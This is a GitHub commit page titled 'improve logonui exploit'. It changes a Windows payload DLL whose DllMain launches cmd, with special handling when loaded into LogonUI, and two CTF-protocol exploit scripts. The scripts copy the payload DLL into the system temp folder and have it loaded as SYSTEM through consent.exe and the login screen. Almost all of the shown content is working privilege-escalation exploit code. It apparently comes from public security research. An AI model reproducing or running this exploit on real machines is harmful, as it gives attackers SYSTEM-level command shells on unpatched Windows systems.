Skip to content
Permalink
Browse files

improve logonui exploit

  • Loading branch information...
taviso committed Jun 26, 2019
1 parent da57c38 commit 1de22b02f0a004cd8a90fba8ea90e643bbe0ce77
Showing with 36 additions and 4 deletions.
  1. +16 −0 payload.c
  2. +4 −0 scripts/ctf-consent-system.ctf
  3. +16 −4 scripts/ctf-logonui-system.ctf
@@ -5,18 +5,34 @@
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
CHAR Command[] = "cmd";
CHAR ModulePath[MAX_PATH];
CHAR ModuleName[MAX_PATH];
STARTUPINFO si;
PROCESS_INFORMATION pi;

ZeroMemory(&si, sizeof(si));
ZeroMemory(&pi, sizeof(pi));
ZeroMemory(&ModulePath, sizeof(ModulePath));
ZeroMemory(&ModuleName, sizeof(ModuleName));
si.cb = sizeof si;

// Learn what process we've loaded into, in case we need it.
if (GetModuleFileNameA(NULL, ModulePath, sizeof ModulePath)) {
_splitpath(ModulePath, NULL, NULL, ModuleName, NULL);
}

switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
// attach to process
if (CreateProcess(NULL, Command, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi)) {

// LogonUI acts strangely if we try to ExitProcess()
if (stricmp(ModuleName, "LOGONUI") == 0) {
WaitForSingleObject(pi.hProcess, INFINITE);
TerminateProcess(GetCurrentProcess(), 0);
}

CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
} else {
@@ -50,3 +50,7 @@ print consent.exe has joined the session, starting exploit...

# Now that we're connected and have a target selected, load the exploit script.
script scripts\ctf-exploit-common-1903.ctf

print
print Exploit complete.
print
@@ -2,10 +2,17 @@
# switching to the Winlogon Desktop, and then exploiting the login screen
# via the CTF session.

print
print !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
print !!! THIS EXPLOIT REQUIRES C:\WINDOWS\TEMP\EXPLOIT.DLL TO EXIST !!!
print !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
print Attempting to copy exploit payload...

# This exploit runs LoadLibraryA(C:\WINDOWS\TEMP\EXPLOIT.DLL) as SYSTEM.
run CMD /C COPY PAYLOAD64.DLL %SYSTEMROOT%\TEMP\EXPLOIT.DLL

# Print a warning if that didnt work.
repeat rc print
repeat rc print !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
repeat rc print !!! THIS EXPLOIT REQUIRES C:\WINDOWS\TEMP\EXPLOIT.DLL TO EXIST !!!
repeat rc print !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
repeat rc print
print
print The screen will lock to trigger the login screen in 5 seconds...

@@ -26,3 +33,8 @@ wait LogonUI.exe

# Now that we're connected and have a target selected, load the exploit script.
script scripts\ctf-exploit-common-1903.ctf

print
print Exploit complete.
print

0 comments on commit 1de22b0

Please sign in to comment.
You can’t perform that action at this time.